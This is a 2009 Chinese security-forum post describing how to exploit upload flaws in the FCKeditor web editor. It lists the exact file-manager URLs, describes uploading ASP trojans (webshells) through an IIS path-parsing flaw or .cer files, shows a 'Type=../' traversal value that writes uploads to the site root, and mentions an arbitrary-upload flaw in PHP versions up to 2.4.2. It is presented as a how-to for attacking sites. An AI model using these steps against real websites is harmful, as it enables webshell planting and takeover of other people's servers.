找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 FCKeditor漏洞
返回列表 发新帖
查看: 574|回复: 0

FCKeditor漏洞

[复制链接]
fuchou-angle

735

主题

1102

回帖

3076

牛毛

二级牛人

积分
3096
QQ
发表于 2009-7-3 16:44:23 | 显示全部楼层 |阅读模式 来自 山东省威海市
FCKeditor漏洞
  1 asp版上传漏洞<--Version 2.2
  FCKeditor/_samples/default.html 或者
  fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp就会看到编辑页面,
  可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马,后者上传cer文件
  如果是ASPX的就将/asp/connector.asp后缀改为ASPX
  Type=Image这个变量是我们自己定义的。比如:
  fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
  这时候我们就创建了一个名为user的目录,默认情况下没有任何文件格式上传限制
  上传后我们的文件就保存在
  /UserFiles/user下了
  我们也可以这样
  fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
  这样文件就可以直接传到网站的根目录了
  2 Fckeditor <=2.4.2 For php 任意上传文件漏洞
  未对Media类型进行上传文件类型的控制,导致用户上传任意文件 利用方式就不在这里重复了
相关文章:
fckeditor漏洞利用
http://www.hxhack.com/bbs/read.php?tid-243800-keyword-FCKeditor%C2%A9%B6%B4.html
jsp的fckeditor漏洞
http://www.hxhack.com/bbs/read.php?tid-265808-keyword-FCKeditor%C2%A9%B6%B4.html
漏洞
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-27 16:55 , Processed in 0.272861 second(s), 32 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表